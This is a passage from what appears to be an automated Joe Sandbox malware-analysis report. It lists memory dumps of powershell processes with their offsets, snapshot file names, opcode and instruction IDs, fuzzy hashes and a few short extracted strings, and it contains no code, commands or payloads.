                                                                                                                                                                    • Instruction Fuzzy Hash: 162127B77084269ED30A77ADBC159EC7380DBD427A34951B3D368CB553EA14A08B8AE0
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000002.00000002.2636490349.00007FFD9B76D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B76D000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_2_2_7ffd9b76d000_powershell.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID: QZ~
                                                                                                                                                                    • API String ID: 0-4217409775
                                                                                                                                                                    • Opcode ID: 7d672d9ecce40d22529df1396b70d00af824f752acffc67869fcc0ad7ae03dba
                                                                                                                                                                    • Instruction ID: bac16e16565d5fd1f355716628b8a3926635a29ab71b431103fde6c80bca526e
                                                                                                                                                                    • Opcode Fuzzy Hash: 7d672d9ecce40d22529df1396b70d00af824f752acffc67869fcc0ad7ae03dba
                                                                                                                                                                    • Instruction Fuzzy Hash: 1441F67140EBC48FE7569B289C559523FF0EF52320B1A06DFD088CB1B7D625A845C7A3
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000002.00000002.2650001262.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_2_2_7ffd9b880000_powershell.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: 20c5caa314611ef30194277e21baa0ece4bb22cce1f1494884a482afc2089b57
                                                                                                                                                                    • Instruction ID: ff76f7586c975f23486080f7b59f10eba6b78627e9f0155bd2d29b77b4be03f6
                                                                                                                                                                    • Opcode Fuzzy Hash: 20c5caa314611ef30194277e21baa0ece4bb22cce1f1494884a482afc2089b57
                                                                                                                                                                    • Instruction Fuzzy Hash: C6D16730A0DB894FD758EF6CC894AB57BE1EF99310F1401BED099C32A6DA35E846C741
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000002.00000002.2656951485.00007FFD9B950000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B950000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_2_2_7ffd9b950000_powershell.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: 6a7afd0509884bcc8622cd841a1e816c65077e7e2b2cc899e8630c4d28fc0538
                                                                                                                                                                    • Instruction ID: 5295ad609a129ad75e081967375b5cfb224aa9f4701a74441e84b6e3a8754b8b
                                                                                                                                                                    • Opcode Fuzzy Hash: 6a7afd0509884bcc8622cd841a1e816c65077e7e2b2cc899e8630c4d28fc0538
                                                                                                                                                                    • Instruction Fuzzy Hash: 07D14832A1FB8E5FEBA59BA848645B57BA0EF56310B0901FED85CCB0E3D958AD05C341
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000002.00000002.2650001262.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_2_2_7ffd9b880000_powershell.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: f742d4fc0b01243367923f126bb90d59c12217d35dc454f7395c7c08ed820e9f
                                                                                                                                                                    • Instruction ID: 9e9f00248650a92490a5acaac9c3c3151989447fab8271d6305328845d50a11d
                                                                                                                                                                    • Opcode Fuzzy Hash: f742d4fc0b01243367923f126bb90d59c12217d35dc454f7395c7c08ed820e9f
                                                                                                                                                                    • Instruction Fuzzy Hash: 9D016D7594EBCC8FC7579B6888284A47FF0EF1A200B0A41E7D499CB1B3D6799918C782
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000002.00000002.2650001262.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_2_2_7ffd9b880000_powershell.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: ddddb0af9161e1cd44d067ee774e839aef39a2695a23eaa149ca910d1dfd4349
                                                                                                                                                                    • Instruction ID: 79e18a2355ffefeef245b83a1bcf0bf18675a69c0af1b22d051e0a1bfe90385d
                                                                                                                                                                    • Opcode Fuzzy Hash: ddddb0af9161e1cd44d067ee774e839aef39a2695a23eaa149ca910d1dfd4349
                                                                                                                                                                    • Instruction Fuzzy Hash: 42412C71A0EE888FDB199F5C58596A8BBE0FB59310F5441BFD09883293DA34B945C7C2
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000002.00000002.2650001262.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_2_2_7ffd9b880000_powershell.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: ffaa2335621dee5614744b7eaddd75ebcb1ecc4c50aeb94087a9d95b9d9cab6a
                                                                                                                                                                    • Instruction ID: c35618869688e340e7ed358042d61ba92f48441c2496d51e1336e50a0b92d497
                                                                                                                                                                    • Opcode Fuzzy Hash: ffaa2335621dee5614744b7eaddd75ebcb1ecc4c50aeb94087a9d95b9d9cab6a
                                                                                                                                                                    • Instruction Fuzzy Hash: 1E01FC3271CA094FDB9CDF1CE85197473E1EBD8320B1001BEE45AC3297D926F8528741
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000002.00000002.2650001262.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_2_2_7ffd9b880000_powershell.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: 672cddce3b61fd07d14acf0d5ff0c6c5c9905a2842d53f114a6d1ab46604d338
                                                                                                                                                                    • Instruction ID: 7942ddcb7b366def54c675fdc0a42c1b9c7b229ae68d60287c1eb1a1f3edd8da
                                                                                                                                                                    • Opcode Fuzzy Hash: 672cddce3b61fd07d14acf0d5ff0c6c5c9905a2842d53f114a6d1ab46604d338
                                                                                                                                                                    • Instruction Fuzzy Hash: 9001A73020CB0C4FD748EF0CE451AA6B3E0FB89320F10056DE58AC36A1DA32E882CB41
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000002.00000002.2650001262.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_2_2_7ffd9b880000_powershell.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: 410d45415105ec2b79a73a5151b166009a6d59437c96258b718101f0952ad60d
                                                                                                                                                                    • Instruction ID: ea871f9ad6c0cef9deeb1ca1db51dfaa4c3378a7d77dc59c23ee9703173be2ad
                                                                                                                                                                    • Opcode Fuzzy Hash: 410d45415105ec2b79a73a5151b166009a6d59437c96258b718101f0952ad60d
                                                                                                                                                                    • Instruction Fuzzy Hash: 52F06C3175C6058FDB5C9A1CF85297573D1E799320B10016EF48BC3697D927F843C645
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000002.00000002.2656951485.00007FFD9B950000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B950000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_2_2_7ffd9b950000_powershell.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: 7becca6c9032fdb6e397fb8aeb90693864d27c72c50bd10d939f524cd3bfb83f
                                                                                                                                                                    • Instruction ID: aa47712430419ba0678b77f383942f638eb2594a260fb7df213853954f15f732
                                                                                                                                                                    • Opcode Fuzzy Hash: 7becca6c9032fdb6e397fb8aeb90693864d27c72c50bd10d939f524cd3bfb83f
                                                                                                                                                                    • Instruction Fuzzy Hash: A0F0E932B4D5098FD7A8EB9CE4519E473E0EF65320B1640BAE06DC71B7CA25EC40C741
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000002.00000002.2656951485.00007FFD9B950000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B950000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_2_2_7ffd9b950000_powershell.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: f727aab171418d43dc6c2d4290f30c4e0c09f86382a01e8b1e4e514e11766a96
                                                                                                                                                                    • Instruction ID: d4b113d18a9f662398950c1d0971590b8fa8e6e0902e3deaddff09dfcad7d7d2
                                                                                                                                                                    • Opcode Fuzzy Hash: f727aab171418d43dc6c2d4290f30c4e0c09f86382a01e8b1e4e514e11766a96
                                                                                                                                                                    • Instruction Fuzzy Hash: 03F0B431A4D5498FD7A4EA9CE0609A873E0EF0532075600BAE05DCB1A7CA25BC40C740
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000002.00000002.2656951485.00007FFD9B950000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B950000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_2_2_7ffd9b950000_powershell.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                                                                                                                                                    • Instruction ID: ef0e477c3a8d88fbc3791122f3f41a252fcdd9f92c2fd245001ca178e7a9b1aa
                                                                                                                                                                    • Opcode Fuzzy Hash: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                                                                                                                                                    • Instruction Fuzzy Hash: A8E0123175C4089FDAB8DA8CE0519A973E1EBA832171141BBD14EC7675CA21ED518B80
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000002.00000002.2650001262.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_2_2_7ffd9b880000_powershell.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: a6859af6e56dcd57312c0820acada789531ea0af2712d70a0bf8843c17e1c935
                                                                                                                                                                    • Instruction ID: 2bd4b7452e8ca639556a101ba233e37e207cd3d88c8fb42445df63553e6ec566
                                                                                                                                                                    • Opcode Fuzzy Hash: a6859af6e56dcd57312c0820acada789531ea0af2712d70a0bf8843c17e1c935
                                                                                                                                                                    • Instruction Fuzzy Hash: B1E01A35909A4D8FCB55EF18C85A8E97BA0FF68201B01429BE81DC7161EB719A58CBC2
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000002.00000002.2650001262.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_2_2_7ffd9b880000_powershell.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID: N_^$N_^$N_^$N_^$N_^
                                                                                                                                                                    • API String ID: 0-2528851458
                                                                                                                                                                    • Opcode ID: c83fb0c4df0825ba3fee1b7f7e0d515effde79b1ff2efd9937c88f2a18162d96
                                                                                                                                                                    • Instruction ID: ebef2444f04a0612abc707cbd32e5d06f6582ea82e6c568a1a85925eb688d309
                                                                                                                                                                    • Opcode Fuzzy Hash: c83fb0c4df0825ba3fee1b7f7e0d515effde79b1ff2efd9937c88f2a18162d96
                                                                                                                                                                    • Instruction Fuzzy Hash: D2314F93E0FAD61BE763477958750942FA0EE5B66470E02E7C0E94F0A3FA1469478342
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.2636232326.00007FFD9B960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B960000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ffd9b960000_powershell.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID: X7AP
                                                                                                                                                                    • API String ID: 0-2362451188
                                                                                                                                                                    • Opcode ID: 916301f27122fe510ebc501b1cd5c1395af4c7a68b6c29adf92f2eaaa5a826fa
                                                                                                                                                                    • Instruction ID: 8e29ab3ddd5bed51456326baa364b28095620d49e4b681dd7cfcd6af5f21fa32
                                                                                                                                                                    • Opcode Fuzzy Hash: 916301f27122fe510ebc501b1cd5c1395af4c7a68b6c29adf92f2eaaa5a826fa
                                                                                                                                                                    • Instruction Fuzzy Hash: A5D14832A2FB8E9FEBA59B7858645B57BA0EF56310B0901FED05DC70E3DA18A905C341
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.2629250954.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ffd9b890000_powershell.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: a7f8b05bb0a9cf23d38742808ea13551191520637b8d8ae1ae222de3d0eeefce
                                                                                                                                                                    • Instruction ID: 3ac518922fb6a7500ca514f406fde1436b7c5109de3f22f657052a9be8d26fae
                                                                                                                                                                    • Opcode Fuzzy Hash: a7f8b05bb0a9cf23d38742808ea13551191520637b8d8ae1ae222de3d0eeefce
                                                                                                                                                                    • Instruction Fuzzy Hash: 2711706190E7CA8FDB179B7898745E53FB0EF17244B0A01E7D489CB0B3DA186949C752
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.2629250954.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ffd9b890000_powershell.jbxd
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.2622329402.00007FFD9B77D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B77D000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ffd9b77d000_powershell.jbxd
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.2629250954.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ffd9b890000_powershell.jbxd
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.2636232326.00007FFD9B960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B960000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ffd9b960000_powershell.jbxd
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.2629250954.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ffd9b890000_powershell.jbxd
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.2629250954.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ffd9b890000_powershell.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID: M_^$M_^$M_^$M_^$M_^
                                                                                                                                                                    • API String ID: 0-2396788759
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000006.00000002.2620227414.00007FFD9B970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B970000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_6_2_7ffd9b970000_powershell.jbxd
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000006.00000002.2609888053.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_6_2_7ffd9b8a0000_powershell.jbxd
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000006.00000002.2602774916.00007FFD9B78D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B78D000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_6_2_7ffd9b78d000_powershell.jbxd
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000006.00000002.2609888053.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_6_2_7ffd9b8a0000_powershell.jbxd
                                                                                                                                                                    • Opcode Fuzzy Hash: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                                                                                                                                                    • Instruction Fuzzy Hash: 8601677121CB0D4FD748EF0CE451AA6B7E0FB99364F10056DE58AC36A5DA36E882CB45
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000006.00000002.2609888053.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_6_2_7ffd9b8a0000_powershell.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: 68b2f9dcd8b878d9b9a2ba7870133e00ca2c623ea35f55f65fd9bde032342b5b
                                                                                                                                                                    • Instruction ID: 404341f0b711f3c5e5f97a92626e6117df4e78507d49df3ecec5c54146b1a065
                                                                                                                                                                    • Opcode Fuzzy Hash: 68b2f9dcd8b878d9b9a2ba7870133e00ca2c623ea35f55f65fd9bde032342b5b
                                                                                                                                                                    • Instruction Fuzzy Hash: 6DF0F67660AA8C5FCB91DF2CDC694E87FA0FF66601B0501ABE489C7061DA2159088BD2
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000006.00000002.2620227414.00007FFD9B970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B970000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_6_2_7ffd9b970000_powershell.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: 11d8bb04571b61efb343b02d51918ce64ce82ac9ab8d4d89d5254af000579169
                                                                                                                                                                    • Instruction ID: 12f33f0deeb6a006eecc4bd5a5208b4863b17aefbd46ea5c68febf94c72bccda
                                                                                                                                                                    • Opcode Fuzzy Hash: 11d8bb04571b61efb343b02d51918ce64ce82ac9ab8d4d89d5254af000579169
                                                                                                                                                                    • Instruction Fuzzy Hash: 0DF0BE32B1E5098FD768EA5CE4919A873E0EF6533071640BAE06DC76B3CA25EC40C785
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000006.00000002.2620227414.00007FFD9B970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B970000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_6_2_7ffd9b970000_powershell.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: 04ddc4e4dca0313fa1c4408041f8b996914b53924da645ff4070bb2900347b69
                                                                                                                                                                    • Instruction ID: 129b33f44cb8e93545e7d3cdafabe1f671a871c4de9137186345812d3433b547
                                                                                                                                                                    • Opcode Fuzzy Hash: 04ddc4e4dca0313fa1c4408041f8b996914b53924da645ff4070bb2900347b69
                                                                                                                                                                    • Instruction Fuzzy Hash: C8F0BE32A0E5498FD764EA5CE4A09A873E0EF0532076600FAE05DCB1B3CA25AC40CB40
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000006.00000002.2620227414.00007FFD9B970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B970000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_6_2_7ffd9b970000_powershell.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                                                                                                                                                    • Instruction ID: 664ee9e526855705bcffdcfcbd412457206555aceccb5f816b9e306c4c7c1cf4
                                                                                                                                                                    • Opcode Fuzzy Hash: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                                                                                                                                                    • Instruction Fuzzy Hash: 43E0123171C4089FD678EA4CE0919AD73E5EBA833171241BBD14EC7672CA21ED518B85
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000006.00000002.2609888053.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_6_2_7ffd9b8a0000_powershell.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID: L_^$L_^$L_^$L_^$L_^
                                                                                                                                                                    • API String ID: 0-2264858084
                                                                                                                                                                    • Opcode ID: 82c668183529e2c4598b24b01c37c9e8deef4f4016459ffb044718b94410bdd1
                                                                                                                                                                    • Instruction ID: 112e1da33eab6b8e9f3df30a94ac81a8e10c8a285875b1e8b865f6e8eec2c93b
                                                                                                                                                                    • Opcode Fuzzy Hash: 82c668183529e2c4598b24b01c37c9e8deef4f4016459ffb044718b94410bdd1
                                                                                                                                                                    • Instruction Fuzzy Hash: 4C31A353F0FAD61BE363037A48750986FA0EE5BA6435F12F7C4E84B0A3FE0469478261
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000008.00000002.2679165704.00007FFD9B960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B960000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_8_2_7ffd9b960000_powershell.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID: X7|5
                                                                                                                                                                    • API String ID: 0-3688954269
                                                                                                                                                                    • Opcode ID: d63667217aa0a9e0504d7323ee30716c1b948f43e26b803c486bd4d25e1e3af9
                                                                                                                                                                    • Instruction ID: 4be7f31c49a9b76796a61e261c837a60bbb34a02e23565176a8a402a02ba1213
                                                                                                                                                                    • Opcode Fuzzy Hash: d63667217aa0a9e0504d7323ee30716c1b948f43e26b803c486bd4d25e1e3af9
                                                                                                                                                                    • Instruction Fuzzy Hash: 27D13732A2FB8E9FEBA99B7858654B57BA0EF16310B0901FFD05DC70E3D918A905C341
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000008.00000002.2672776835.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_8_2_7ffd9b890000_powershell.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: b9af4999d9c8286af871cdf8a381bdfffc236a64ecd1c9e52d9ea5253d18882a
                                                                                                                                                                    • Instruction ID: 18ec9f969c597f2b0a76215b85725a31411bab1e5f6aa5be036a273bdb752758
                                                                                                                                                                    • Opcode Fuzzy Hash: b9af4999d9c8286af871cdf8a381bdfffc236a64ecd1c9e52d9ea5253d18882a
                                                                                                                                                                    • Instruction Fuzzy Hash: B1F1F8A3A0F6D64FEB668BA848750E47FE4FF26654B0A01FBD0D48B0E3ED1529078751
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000008.00000002.2672776835.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_8_2_7ffd9b890000_powershell.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: a7f8b05bb0a9cf23d38742808ea13551191520637b8d8ae1ae222de3d0eeefce
                                                                                                                                                                    • Instruction ID: 3ac518922fb6a7500ca514f406fde1436b7c5109de3f22f657052a9be8d26fae
                                                                                                                                                                    • Opcode Fuzzy Hash: a7f8b05bb0a9cf23d38742808ea13551191520637b8d8ae1ae222de3d0eeefce
                                                                                                                                                                    • Instruction Fuzzy Hash: 2711706190E7CA8FDB179B7898745E53FB0EF17244B0A01E7D489CB0B3DA186949C752
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000008.00000002.2672776835.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_8_2_7ffd9b890000_powershell.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: 1b8f70b141e364faf8f90345c1eea65e332c8786bae4699b5a7b2299d9fd1c57
                                                                                                                                                                    • Instruction ID: 842251e0e087f9b546b2303f605acc63183787228c167c57de8ef07732d54443
                                                                                                                                                                    • Opcode Fuzzy Hash: 1b8f70b141e364faf8f90345c1eea65e332c8786bae4699b5a7b2299d9fd1c57
                                                                                                                                                                    • Instruction Fuzzy Hash: AF412B71A0DA888FDF189F5C580A6A87FE1FB59710F5481AFE458C3293DA24B94587C2
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000008.00000002.2665627606.00007FFD9B77D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B77D000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_8_2_7ffd9b77d000_powershell.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: 48da377cfb43f58dc8467bd0170170a0e922031bb2597457e1ba3db9cb23ea2d
